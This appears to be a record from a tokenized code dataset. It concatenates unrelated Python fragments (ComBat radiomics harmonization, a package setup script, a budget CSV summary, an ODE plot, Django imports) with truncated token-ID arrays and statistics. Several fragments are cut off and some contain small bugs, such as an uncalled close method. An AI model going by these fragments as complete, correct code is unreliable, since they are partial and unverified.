i_feat.tolist() + image_features_train_noncombat[fnum] # Sort based on feature label feature_labels_temp, feature_values_temp =\ zip(*sorted(zip(feature_labels, feature_values_temp))) # Convert to pandas Series and save as hdf5 pid = label_data_train['patient_IDs'][fnum] panda_data = pd.Series([parameters, pid, feature_values_temp, feature_labels_temp], index=panda_labels, name=name ) print(f'Saving image features to: {features_train_out[fnum]}.') panda_data.to_hdf(features_train_out[fnum], 'image_features') # Repeat for testing if required if features_test_in: print(len(image_features_test_combat)) print(data_harmonized.shape[1]) feature_values_test_combat = [data_harmonized[:, i] for i in range(data_harmonized.shape[1] - len(image_features_test_combat), data_harmonized.shape[1])] for fnum, i_feat in enumerate(feature_values_test_combat): print(fnum) # Combine ComBat and non-ComBat features feature_values_temp = i_feat.tolist() + image_features_test_noncombat[fnum] # Sort based on feature label feature_labels_temp, feature_values_temp =\ zip(*sorted(zip(feature_labels, feature_values_temp))) # Convert to pandas Series and save as hdf5 pid = label_data_test['patient_IDs'][fnum] panda_data = pd.Series([parameters, pid, feature_values_temp, feature_labels_temp], index=panda_labels, name=name ) print(f'Saving image features to: {features_test_out[fnum]}.') panda_data.to_hdf(features_test_out[fnum], 'image_features') def ComBatPython(dat, batch, mod=None, par=1, eb=1, per_feature=False, plotting=False): """ Run the ComBat Function python script. par = 0 is non-parametric. """ # convert inputs to neuroCombat format. covars = dict() categorical_cols = list() covars['batch'] = batch if mod is not None: for i_mod in range(mod.shape[1]): label = f'mod_{i_mod}' covars[label] = [m for m in mod[:, i_mod]] categorical_cols.append(label) covars = pd.DataFrame(covars) batch_col = 'batch' if par == 0: parametric = False elif par == 1: parametric = True else: raise WORCValueError(f'Par should be 0 or 1, now {par}.') if eb == 0: eb = False elif eb == 1: eb = True else: raise WORCValueError(f'eb should be 0 or 1, now {eb}.') if per_feature == 0: per_feature = False elif per_feature == 1: per_feature = True else: raise WORCValueError(f'per_feature should be 0 or 1, now {per_feature}.') # execute ComBat if not per_feature: data_harmonized = neuroCombat(dat=dat, covars=covars, batch_col=batch_col, categorical_cols=categorical_cols, eb=eb, parametric=parametric) elif per_feature: print('\t Executing ComBat per feature.') data_harmonized = np.zeros(dat.shape) # Shape: (features, samples) for i in range(dat.shape[0]): if eb: # Copy feature + random noise random_feature = np.random.rand(dat[i, :].shape[0]) feat_temp = np.asarray([dat[i, :], dat[i, :] + random_feature]) else: # Just use the single feature feat_temp = np.asarray([dat[i, :]]) feat_temp = neuroCombat(dat=feat_temp, covars=covars, batch_col=batch_col, categorical_cols=categorical_cols, eb=eb, parametric=parametric) data_harmonized[i, :] = feat_temp[0, :] if plotting: feat1 = dat[i, :] feat1_harm = data_harmonized[i, :] print(len(feat1)) feat1_b1 = [f for f, b in zip(feat1, batch[0]) if b == 1.0] feat1_b2 = [f for f, b in zip(feat1, batch[0]) if b == 2.0] print(len(feat1_b1)) print(len(feat1_b2)) feat1_harm_b1 = [f for f, b in zip(feat1_harm, batch[0]) if b == 1.0] feat1_harm_b2 = [f for f, b in zip(feat1_harm, batch[0]) if b == 2.0] plt.figure() ax = plt.subplot(2, 1, 1) ax.scatter(np.ones((len(feat1_b1))), feat1_b1, color='red') ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_b2, color='blue') plt.title('Before Combat') ax = plt.subplot(2, 1, 2) ax.scatter(np.ones((len(feat1_b1))), feat1_harm_b1, color='red') ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_harm_b2, color='blue') plt.title('After Combat') plt.show() else: raise WORCValueError(f'per_feature should be False or True, now {per_feature}.') return data_harmonized def Synthetictest(n_patients=50, n_features=10, par=1, eb=1, per_feature=False, difscale=False, logarithmic=False, oddpatient=True, oddfeat=True, samefeat=True): """Test for ComBat with Synthetic data.""" features = np.zeros((n_features, n_patients)) batch = list() # First batch: Gaussian with loc 0, scale 1 for i in range(0, int(n_patients/2)): feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features)] if i == 1 and oddpatient: feat_temp = [np.random.normal(loc=10.0, scale=1.0) for i in range(n_features)] elif oddfeat: feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)] if samefeat: feat_temp[-1] = 1 features[:, i] = feat_temp batch.append(1) # Get directions for features directions = list() for i in range(n_features): direction = random.random() if direction > 0.5: directions.append(1.0) else: directions.append(-1.0) # First batch: Gaussian with loc 5, scale 1 for i in range(int(n_patients/2), n_patients): feat_temp = [np.random.normal(loc=direction*5.0, scale=1.0) for i in range(n_features)] if oddfeat: feat_temp = [np.random.normal(loc=5.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)] if difscale: feat_temp = [f + 1000 for f in feat_temp] feat_temp = np.multiply(feat_temp, directions) if samefeat: feat_temp[-1] = 1 features[:, i] = feat_temp batch.append(2) # Create mod var mod = [[np.random.randint(30, 100) for i in range(n_patients)]] # Apply ComBat batch = np.asarray([batch]) mod = np.transpose(np.asarray(mod)) if logarithmic: minfeat = np.min(features) features = np.log10(features + np.abs(minfeat) + 1E-100) data_harmonized = ComBatPython(dat=features, batch=batch, mod=mod, par=par, eb=eb, per_feature=per_feature) if logarithmic: data_harmonized = 10 ** data_harmonized - np.abs(minfeat) for i in range(n_features): f = plt.figure() ax = plt.subplot(2, 1, 1) ax.scatter(np.ones((int(n_patients/2))), features[i, 0:int(n_patients/2)], color='red') ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, features[i, int(n_patients/2):], color='blue') plt.title('Before Combat') ax = plt.subplot(2, 1, 2) ax.scatter(np.ones((int(n_patients/2))), data_harmonized[i, 0:int(n_patients/2)], color='red') ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, data_harmonized[i, int(n_patients/2):], color='blue') plt.title('After Combat') plt.show() f.savefig(f'combat_par{par}_eb{eb}_perfeat{per_feature}_feat{i}.png') # Logarithmic: not useful, as we have negative numbers, and (almost) zeros. # so combat gives unuseful results. # Same feature twice with eb and par: nans def ComBatMatlab(dat, batch, command, mod=None, par=1, per_feature='true'): """ Run the ComBat Function Matlab script. par = 0 is non-parametric. """ # Mod: default argument is empty list if mod is None: mod = [] # TODO: Add check whether matlab executable is found # Save the features in a .mat MatLab Compatible format # NOTE: Should change this_folder to a proper temporary directory this_folder = os.path.dirname(os.path.realpath(__file__)) tempdir = tempfile.gettempdir() tempfile_in = os.path.join(tempdir, 'combat_input.mat') tempfile_out = os.path.join(tempdir, 'combat_output.mat') ComBatFolder = os.path.join(os.path.dirname(this_folder), 'external', 'ComBatHarmonization', 'Matlab', 'scripts') dict = {'output': tempfile_out, 'ComBatFolder': ComBatFolder, 'datvar': dat, 'batchvar': batch, 'modvar': mod, 'parvar': par, 'per_feature': per_feature } sio.savemat(tempfile_in, dict) # Make sure there is no tempfile out from the previous run if os.path.exists(tempfile_out): os.remove(tempfile_out) # Run ComBat currentdir = os.getcwd() if platform == "linux" or platform == "linux2": commandseparator = ' ; ' elif platform == "win32": commandseparator = ' & ' # BIGR Cluster: /cm/shared/apps/matlab/R2015b/bin/matlab regcommand = ('cd "' + this_folder + '"' + commandseparator + '"' + command + '" -nodesktop -nosplash -nojvm -r "combatmatlab(' + "'" + str(tempfile_in) + "'" + ')"' + commandseparator + 'cd "' + currentdir + '"') print(f'Executing ComBat in Matlab through command: {regcommand}.') proc = subprocess.Popen(regcommand, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, ) proc.wait() stdout_value, stderr_value = proc.communicate() # BUG: Waiting does not work, just wait for output to arrive, either with # the actual output or an error message succes = False while succes is False: if os.path.exists(tempfile_out): try: mat_dict = sio.loadmat(tempfile_out) try: data_harmonized = mat_dict['data_harmonized'] succes = True except KeyError: try: message = mat_dict['message'] raise WORCValueError(f'Error in Matlab ComBat execution: {message}.') except KeyError: pass except (sio.matlab.miobase.MatReadError, ValueError): pass # Check if expected output file exists if not os.path.exists(tempfile_out): raise WORCValueError(f'Error in Matlab ComBat execution: command: {regcommand}, stdout: {stdout_value}, stderr: {stderr_value}') # Read the output from ComBat mat_dict = sio.loadmat(tempfile_out) data_harmonized = mat_dict['data_harmonized'] data_harmonized = np.transpose(data_harmonized) # Remove temporary files os.remove(tempfile_out) os.remove(tempfile_in) return data_harmonized
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 12131, 8436, 35914, 48656, 4912, 18481, 353, 11043, 11, 2129, 32514, 286, 198, 2, 8366, 554, 18982, 873, 290, 5325, 12371, 11, 5256, 8597, 385, 13122, 11, 18481, 353, 11...
2.149943
11,411
import os import sys from setuptools import setup, find_packages ROOT = os.path.realpath(os.path.join(os.path.dirname( sys.modules['__main__'].__file__))) sys.path.insert(0, os.path.join(ROOT, 'src')) setup( name='pgworker', packages=find_packages('src'), package_dir={'': 'src'}, classifiers=[ 'Intended Audience :: Developers', 'Intended Audience :: System Administrators', 'Operating System :: POSIX :: Linux', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', ], entry_points={ 'console_scripts': [ 'pgworker = pgworker.runner:main' ] } )
[ 11748, 28686, 198, 11748, 25064, 198, 198, 6738, 900, 37623, 10141, 1330, 9058, 11, 1064, 62, 43789, 198, 198, 13252, 2394, 796, 28686, 13, 6978, 13, 5305, 6978, 7, 418, 13, 6978, 13, 22179, 7, 418, 13, 6978, 13, 15908, 3672, 7, 198...
2.407285
302
import os import csv path = '/Users/kevinkosumi12345/Genti/python-challenge/PyBank/Resources/budget_data.csv' budget_csv=os.path.join("../Resources", "budget_data.csv") csvfile = open(path, newline="") reader=csv.reader(csvfile, delimiter=",") header = next(reader) # print(header) # the columns we have to convert into lists # Create first 2 empty lists according 2 columns date = [] profloss = [] # print("Financial Anaysis") # print("-----------------------------------------") for row in reader: date.append(row[0]) profloss.append(int(row[1])) # getting the total of Profit/Losses total_profloss='Total Profit/Losses: $ ' + str(sum(profloss)) # print(total_profloss) # getting the number of months in entire period monthcount = 'Total months: ' + str(len(date)) # print(monthcount) # before finding the averadge of change in Profit/Losses, first we have to find the total change Total_change_profloss = 0 for x in range(1, len(profloss)): Total_change_profloss = Total_change_profloss + (profloss[x] - profloss[x-1]) # finding the averidge of change in Profit/Losses avg_change_profloss = 'Averidge change in Profit/Loss: ' + str(round(Total_change_profloss/(len(profloss)-1),2)) # print(avg_change_profloss) # getting the max value of data in Profit/Losses which is the Greatest Increase of Profit/Losses maxVal = 'Greatest increase of Profit/Losses: ' + ' on ' + str(date[profloss.index(max(profloss))]) + ' $ ' + str(max(profloss)) # print(maxVal) # the min Value of date in Profit/Losses which is the Greatest Decrease minVal = 'Greatest decrease of Profit/Losses: ' + ' on ' + str(date[profloss.index(min(profloss))]) + ' $ ' + str(min(profloss)) # print(minVal) DataBudget = open('analisis.csv' , 'w') DataBudget.write('Financial Analysus\n') DataBudget.write('------------------------\n') DataBudget.write(monthcount + '\n') DataBudget.write(total_profloss + '\n') DataBudget.write(avg_change_profloss + '\n') DataBudget.write(maxVal + '\n') DataBudget.write(minVal + '\n') DataBudget.close
[ 11748, 28686, 198, 11748, 269, 21370, 628, 198, 198, 6978, 796, 31051, 14490, 14, 365, 85, 676, 418, 12994, 10163, 2231, 14, 38, 298, 72, 14, 29412, 12, 36747, 3540, 14, 20519, 28650, 14, 33236, 14, 37315, 62, 7890, 13, 40664, 6, 19...
2.813793
725
import numpy as np import matplotlib.pyplot as plt T = 30000 # v = 0.02906 # v = 0.617085 v = 0.99 h = 0.01 a = 0.5 b = 0.5 epsilon = 0.05 c = 0.4 eta = lambda rho: np.exp(-(rho)**2/(2*c**2)) nrho = lambda rho, v: -2.0*(rho**3 + (rho-1.0)*v/2.0 - rho)/(rho + 1.0) nu = lambda rho: (b - eta(rho+1))/a u = np.zeros(T) rho = np.zeros(T) time = np.zeros(T) # Maps f = lambda rho, u, v: -rho**3 - (rho + 1.0)*u/2.0 - (rho - 1.0)*v/2.0 + rho g1 = lambda rho, u, v: epsilon*(b - a*u - eta(rho+1)) # Initial conditions u[0] = 0.0 rho[0] = -0.0 for i in range(T-1): rho[i+1] = rho[i] + h*f(rho[i], u[i], v) u[i+1] = u[i] + h*g1(rho[i], u[i], v) time[i+1] = time[i] + h fig, ax = plt.subplots(1, 2) # X, Y = np.meshgrid(np.arange(-0.6, 0.6, 0.1), np.arange(-0.2, 1.0, .1)) # U = f(X, Y, v)/epsilon #rho # V = g1(X, Y, v)/epsilon #u # q = ax[0].quiver(X, Y, U, V, units='x', pivot='tip')#, width=0.022, scale=1 / 0.40) rhos = np.linspace(-0.99, 1, 100) ax[0].plot( rhos, nrho(rhos, v), color = [0.8, 0.5, 0.5], linewidth = 3.0) ax[0].plot( rhos, nu(rhos), color = [0.5, 0.5, 0.8], linewidth = 3.0) ax[0].plot( rho[0], u[0], 'k.', linewidth = 3.0) ax[0].plot( rho, u, 'k' ) ax[0].plot( [-1, -1], [-1.5, 1.5], 'k--') ax[0].set_ylabel('u') ax[0].set_xlabel(r'$\rho$') ax[0].text(0.5, nu(0.5)+0.05, r'$u_0$') ax[0].text(0.95, nrho(0.9, v), r'$\rho_0$') ax[0].axis([-2, 2, -1.0, 1.5]) ax[1].plot( time, u, label = 'u') ax[1].plot( time, rho, label = r'$\rho$' ) ax[1].legend() ax[1].set_xlabel('time') plt.show()
[ 11748, 299, 32152, 355, 45941, 220, 220, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 220, 198, 198, 51, 796, 513, 2388, 198, 2, 410, 796, 657, 13, 48891, 3312, 198, 2, 410, 796, 657, 13, 47941, 2919, 20, 198, 85,...
1.712994
885
import numpy as np import os my_array = np.zeros(10) print(my_array) os.system('pip freeze > requirements.txt') my_list = [1,2,3,4,5] for item in my_list: print(item)
[ 11748, 299, 32152, 355, 45941, 198, 11748, 28686, 628, 198, 1820, 62, 18747, 796, 45941, 13, 9107, 418, 7, 940, 8, 198, 4798, 7, 1820, 62, 18747, 8, 198, 198, 418, 13, 10057, 10786, 79, 541, 16611, 1875, 5359, 13, 14116, 11537, 198,...
2.285714
77
#! /usr/bin/python3 import argparse import os import re import sqlite3 as sql import sys import xml.etree.cElementTree as et import traceback import lib.initialize as initialize import lib.sqlite_interface as misc import lib.meta as meta # ================== # EXPORTED FUNCTIONS # ==================
[ 2, 0, 1220, 14629, 14, 8800, 14, 29412, 18, 198, 198, 11748, 1822, 29572, 198, 11748, 28686, 198, 11748, 302, 198, 11748, 44161, 578, 18, 355, 44161, 198, 11748, 25064, 198, 11748, 35555, 13, 316, 631, 13, 66, 20180, 27660, 355, 2123,...
3.4
90
from matplotlib.pyplot import get import pyhips from pyhips import get_image def test_get_image(): """ Tests the get_image() function to make sure no errors are thrown. """ assert get_image("Vega", frame="ICRS", survey="DSS", cmap="plasma") == 0 assert get_image("notanid", frame="ICRS", survey="DSS", cmap="plasma") == 1 assert get_image("Vega", frame="notaframe", survey="DSS", cmap="plasma") == 1 assert get_image("Vega", frame="ICRS", survey="notasurvey", cmap="plasma") == 1 assert get_image("Vega", frame="ICRS", survey="DSS", cmap="notacolormap") == 1 if __name__ == "__main__": test_get_image()
[ 6738, 2603, 29487, 8019, 13, 9078, 29487, 1330, 651, 198, 11748, 12972, 5748, 198, 6738, 12972, 5748, 1330, 651, 62, 9060, 628, 198, 4299, 1332, 62, 1136, 62, 9060, 33529, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 30307, 262, 651...
2.669421
242
""" Template module for cumulus. template class for reading yaml tempalte and creating data_source objects to retrieve external data. """
[ 37811, 198, 30800, 8265, 329, 10973, 23515, 13, 198, 28243, 1398, 329, 3555, 331, 43695, 2169, 18596, 660, 290, 4441, 1366, 62, 10459, 5563, 284, 198, 1186, 30227, 7097, 1366, 13, 198, 37811, 198 ]
4.058824
34
# Bubble sort steps through the list and compares adjacent pairs of elements. The elements are swapped if they are in the wrong order. The pass through the unsorted portion of the list is repeated until the list is sorted. Because Bubble sort repeatedly passes through the unsorted part of the list, it has a worst case complexity of O(n).
[ 2, 220, 33691, 3297, 4831, 832, 262, 1351, 290, 23008, 15909, 14729, 286, 4847, 13, 383, 4847, 389, 37245, 611, 484, 389, 287, 262, 2642, 1502, 13, 383, 1208, 832, 262, 5576, 9741, 6903, 286, 262, 1351, 318, 5100, 1566, 262, 1351, 3...
4.802817
71
if __name__ == '__main__': minion_game(input("Enter a string: "))
[ 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 28365, 62, 6057, 7, 15414, 7203, 17469, 257, 4731, 25, 366, 4008, 198 ]
2.535714
28
# -*- coding: utf-8 -*- import numpy as np X = np.random.rand(2) #input W = np.random.rand(2,3) #weight B = np.random.rand(3) #bias print(X) print(W) print(B) Y=np.dot(X,W)+B print(Y)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 299, 32152, 355, 45941, 628, 198, 55, 796, 45941, 13, 25120, 13, 25192, 7, 17, 8, 1303, 15414, 198, 54, 796, 45941, 13, 25120, 13, 25192, 7, 17, 11, 18, 8, ...
1.928571
98
from pytest_bdd import given, when, then from model.contact import Contact import random
[ 6738, 12972, 9288, 62, 65, 1860, 1330, 1813, 11, 618, 11, 788, 198, 6738, 2746, 13, 32057, 1330, 14039, 198, 11748, 4738 ]
4
22
#!/usr/bin/env python """ Figures generated by HiST program intended for use with in/ files including: *_flame.ini *_impulse.ini *_trans.ini Flaming Aurora 2 cameras: ./FigureMaker.py in/2cam_flame.ini Translating Aurora 2 cameras: ./FigureMaker.py in/2cam_trans.ini Impulse Aurora (for testing): ./FigureMaker.py in/2cam_impulse.ini Table of results for 2 and 3 cam: ./FigureMaker.py in/table_flame{2,3}.ini REAL actual camera data (just dump synchroinzed frames: ./FigureMaker.py -m realvid in/apr14T085454 -m optim reconstruct only """ from histfeas import userinput, hist_figure from histfeas.loadAnalyze import readresults, findxlsh5 P = userinput() #%% compute if not P["load"]: hist_figure(P) #%% load flist, P = findxlsh5(P) readresults(flist, P)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 37811, 198, 14989, 942, 7560, 416, 15902, 2257, 1430, 198, 198, 600, 1631, 329, 779, 351, 287, 14, 3696, 1390, 25, 198, 9, 62, 49621, 13, 5362, 198, 9, 62, 11011, 9615, 13, 5362, 1...
2.736655
281
from django.db import models # Create your models here. from django.contrib.auth.models import ( AbstractBaseUser, BaseUserManager, PermissionsMixin, ) from django.core.validators import RegexValidator from django.db import models
[ 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 198, 2, 13610, 534, 4981, 994, 13, 198, 6738, 42625, 14208, 13, 3642, 822, 13, 18439, 13, 27530, 1330, 357, 198, 220, 220, 220, 27741, 14881, 12982, 11, 198, 220, 220, 220, 7308, 12982, ...
3.1
80
"""Component to control v6m relays and sensors. For more details about this component, please refer to the documentation at https://home-assistant.io/components/v6m/ """ import logging import voluptuous as vol from homeassistant.const import ( EVENT_HOMEASSISTANT_STOP, CONF_HOST, CONF_PORT, CONF_NAME) import homeassistant.helpers.config_validation as cv REQUIREMENTS = ['pyv6m==0.0.1'] _LOGGER = logging.getLogger(__name__) DOMAIN = 'v6m' CONFIG_SCHEMA = vol.Schema({ DOMAIN: vol.Schema({ vol.Required(CONF_HOST): cv.string, vol.Required(CONF_PORT): cv.port, vol.Optional(CONF_NAME, default=DOMAIN): cv.string, }), }, extra=vol.ALLOW_EXTRA) def setup(hass, base_config): """Start V6M controller.""" from pyv6m.pyv6m import V6M config = base_config.get(DOMAIN) host = config[CONF_HOST] port = config[CONF_PORT] controller = V6MController(host, port) hass.data[config[CONF_NAME]] = controller hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, cleanup) return True
[ 37811, 21950, 284, 1630, 410, 21, 76, 823, 592, 290, 15736, 13, 198, 198, 1890, 517, 3307, 546, 428, 7515, 11, 3387, 3522, 284, 262, 10314, 379, 198, 5450, 1378, 11195, 12, 562, 10167, 13, 952, 14, 5589, 3906, 14, 85, 21, 76, 14, ...
2.473934
422
import uuid from django.db import models from django.db.models.fields import TextField
[ 11748, 334, 27112, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 6738, 42625, 14208, 13, 9945, 13, 27530, 13, 25747, 1330, 8255, 15878, 628, 220, 220, 220, 220, 198 ]
3.032258
31
""" References: https://github.com/scaelles/OSVOS-TensorFlow """ from __future__ import print_function import os import random import tensorflow as tf import time import numpy as np from utils import models from utils.load_data_finetune import Dataset from utils.logger import create_logger # seed seed = random.randint(1, 100000) # seed = 0 tf.random.set_seed(seed) random.seed(seed) np.random.seed(seed) # User defined path parameters # finetuning (one label) and testing dataset sequence_images_path = './datasets/finetune_test_dataset/JPEGImages/480p' sequence_names = os.listdir(sequence_images_path) # Get the best frame selection from BubblNet bub_frame_path = './datasets/bubbleNet_data/rawData' def create_non_exist_file(non_exist_file): """Create the file when it does not exist""" if not os.path.exists(non_exist_file): os.mkdir(non_exist_file) def select_optimal_frame(seq_name): """Use the optimal frame from BubbleNet selection for fine-tuning""" # # Select from BN0 or BNLF # frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/all.txt') # # Select from BN0 # frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BN0.txt') # Select from BNLF frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BNLF.txt') frame_file = open(frame_txt, 'r') frame_nums = frame_file.readlines() # The following code is used to extract the name of frame selection # refer to the txt file in './datasets/bubbleNet_data/rawData/frame_selection' for your information if len(frame_nums) == 3: frame_random_jpg = frame_nums[2][:9] frame_random_png = frame_nums[2][:5] + '.png' # when two bubblenet models select the different frames, the txt file will have 5 lines elif len(frame_nums) == 5: frame_suggestion1_jpg = frame_nums[2][:9] frame_suggestion1_png = frame_nums[2][:5] + '.png' frame_suggestion2_jpg = frame_nums[4][:9] frame_suggestion2_png = frame_nums[4][:5] + '.png' frame_random_lst = random.choice( [[frame_suggestion1_jpg, frame_suggestion1_png], [frame_suggestion2_jpg, frame_suggestion2_png]]) frame_random_jpg = frame_random_lst[0][:9] frame_random_png = frame_random_lst[1][:9] else: raise ValueError("frame file from BubbleNet is not correct") return frame_random_jpg, frame_random_png if __name__ == '__main__': train_test(sequence_names)
[ 37811, 198, 19927, 25, 3740, 1378, 12567, 13, 785, 14, 1416, 64, 695, 274, 14, 2640, 53, 2640, 12, 51, 22854, 37535, 198, 37811, 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 11748, 28686, 198, 11748, 4738, 198, 11748, 1119...
2.558187
971
from dataclasses import field, dataclass from typing import List from kinopoisk_unofficial.contract.response import Response from kinopoisk_unofficial.model.season import Season
[ 6738, 4818, 330, 28958, 1330, 2214, 11, 4818, 330, 31172, 198, 6738, 19720, 1330, 7343, 198, 198, 6738, 18967, 404, 78, 1984, 62, 403, 16841, 13, 28484, 13, 26209, 1330, 18261, 198, 6738, 18967, 404, 78, 1984, 62, 403, 16841, 13, 1984...
3.829787
47
import subprocess import os import shutil import tempfile import random import string import yaml src_dir=os.path.dirname(os.path.realpath(__file__)) #def _write_text_file(fname,txt): # with open(fname,'w') as f: # f.write(txt)
[ 11748, 850, 14681, 198, 11748, 28686, 198, 11748, 4423, 346, 198, 11748, 20218, 7753, 198, 11748, 4738, 198, 11748, 4731, 198, 11748, 331, 43695, 198, 198, 10677, 62, 15908, 28, 418, 13, 6978, 13, 15908, 3672, 7, 418, 13, 6978, 13, 53...
2.5
96
#! /usr/bin/env python3 # coding=utf-8 # Copyright (c) 2021 NVIDIA CORPORATION. All rights reserved. # Copyright 2021 The MLPerf Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy as np import time from scipy import signal from global_vars import * __doc__ = """ Collection of utilities 3D UNet MLPerf-Inference reference model uses. gaussian_kernel(n, std): returns gaussian kernel; std is standard deviation and n is number of points apply_norm_map(image, norm_map): applies normal map norm_map to image and return the outcome apply_argmax(image): returns indices of the maximum values along the channel axis finalize(image, norm_map): finalizes results obtained from sliding window inference prepare_arrays(image, roi_shape): returns empty arrays required for sliding window inference upon roi_shape get_slice_for_sliding_window(image, roi_shape, overlap): returns indices for image stride, to fulfill sliding window inference timeit(function): custom-tailored decorator for runtime measurement of each inference """ def gaussian_kernel(n, std): """ Returns gaussian kernel; std is standard deviation and n is number of points """ gaussian1D = signal.gaussian(n, std) gaussian2D = np.outer(gaussian1D, gaussian1D) gaussian3D = np.outer(gaussian2D, gaussian1D) gaussian3D = gaussian3D.reshape(n, n, n) gaussian3D = np.cbrt(gaussian3D) gaussian3D /= gaussian3D.max() return gaussian3D def apply_norm_map(image, norm_map): """ Applies normal map norm_map to image and return the outcome """ image /= norm_map return image def apply_argmax(image): """ Returns indices of the maximum values along the channel axis Input shape is (bs=1, channel=3, (ROI_SHAPE)), float -- sub-volume inference result Output shape is (bs=1, channel=1, (ROI_SHAPE)), integer -- segmentation result """ channel_axis = 1 image = np.argmax(image, axis=channel_axis).astype(np.uint8) image = np.expand_dims(image, axis=0) return image def finalize(image, norm_map): """ Finalizes results obtained from sliding window inference """ # NOTE: layout is assumed to be linear (NCDHW) always # apply norm_map image = apply_norm_map(image, norm_map) # argmax image = apply_argmax(image) return image def prepare_arrays(image, roi_shape=ROI_SHAPE): """ Returns empty arrays required for sliding window inference such as: - result array where sub-volume inference results are gathered - norm_map where normal map is constructed upon - norm_patch, a gaussian kernel that is applied to each sub-volume inference result """ assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\ f"Need proper ROI shape: {roi_shape}" image_shape = list(image.shape[2:]) result = np.zeros(shape=(1, 3, *image_shape), dtype=image.dtype) norm_map = np.zeros_like(result) norm_patch = gaussian_kernel( roi_shape[0], 0.125*roi_shape[0]).astype(norm_map.dtype) return result, norm_map, norm_patch def runtime_measure(function): """ A decorator for runtime measurement Custom-tailored for measuring inference latency Also prints str: mystr that summarizes work in SUT """ return get_latency
[ 2, 0, 1220, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 19617, 28, 40477, 12, 23, 198, 2, 15069, 357, 66, 8, 33448, 15127, 23929, 44680, 6234, 13, 1439, 2489, 10395, 13, 198, 2, 15069, 33448, 383, 10373, 5990, 69, 46665, 13, 14...
3.017941
1,282
import binaryRepr # Create decorator function to see how many times functions are called # Calculate Partition (C_k, r(U)) - the partitions # of each candidate at level k are calculated # Takes in data frame of relation and a candidate in C_km1 # Outputs partition of Candidate in C_km1 in relation to data frame # Obtain FDs(C_km1) - checks the FDs of each # candidate X in C_k # - FDs of the form X -> v_i, where # v_i *Exists* U - X^{+} are checked by # comparing *Partition* X and *Partition* X v_i # # F = Null_Set # for each candidate X in C_km1 # for each v_i *exists* U - X^{+} \\Pruning rule 3 # if (Cardinality(*Partition* X) == Cardinality(*Partition X v_i)) then # { # X* = X *Union* {v_i} # F = F *Union* {X -> v_i} \\Theorem 2 # } # return (F); def f(C_km1, df, Closure, U, Cardinality): # Set F to null list; Initialize U_c to remaining columns in data frame F = []; U_c = list(df.head(0)); # Identify the subsets whose cardinality of partition should be tested SubsetsToCheck = [list(Subset) for Subset in set([frozenset(Candidate + [v_i]) for Candidate in C_km1 for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)]))])]; # Add singleton set to SubsetsToCheck if on first k-level if len(C_km1[0]) == 1: SubsetsToCheck += C_km1; # Iterate through subsets mapped to the Cardinality of Partition function for Cand, Card in zip(SubsetsToCheck, map(CardOfPartition, SubsetsToCheck, [df]*len(SubsetsToCheck))): # Add Cardinality of Partition to dictionary Cardinality[binaryRepr.toBin(Cand, U)] = Card; # Iterate through candidates of C_km1 for Candidate in C_km1: # Iterate though attribute subsets that are not in U - X{+}; difference b/t U and inclusive closure of candidate for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)])): # Check if the cardinality of the partition of {Candidate} is equal to that of {Candidate, v_i} if Cardinality[binaryRepr.toBin(Candidate, U)] == Cardinality[binaryRepr.toBin(Candidate + [v_i], U)]: # Add attribute v_i to closure Closure[binaryRepr.toBin(Candidate, U)].add(v_i) # Add list (Candidate, v_i) to F F.append([tuple(Candidate), v_i]); return Closure, F, Cardinality;
[ 11748, 13934, 6207, 81, 198, 198, 2, 13610, 11705, 1352, 2163, 284, 766, 703, 867, 1661, 5499, 389, 1444, 198, 198, 2, 27131, 378, 2142, 653, 357, 34, 62, 74, 11, 374, 7, 52, 4008, 532, 262, 43869, 198, 2, 220, 220, 220, 220, 22...
2.317431
1,090
import os import numpy as np import pandas as pd import experiments.benchmarks.benchmark as benchmark ActivityBenchmark()
[ 11748, 28686, 198, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 11748, 10256, 13, 26968, 14306, 13, 26968, 4102, 355, 18335, 628, 198, 198, 16516, 44199, 4102, 3419, 198 ]
3.527778
36
import xml.etree.ElementTree as et from dateutil import parser from django.shortcuts import render from django.shortcuts import redirect from django.core.urlresolvers import reverse import untangle from .forms import MenuplanSearchForm from .forms import MenuplanCreateForm from .tables import MenuplanTable from .dbaccess import add_menuplan from .dbaccess import get_menuplans from .dbaccess import create_menuplan from .dbaccess import get_menuplan_display
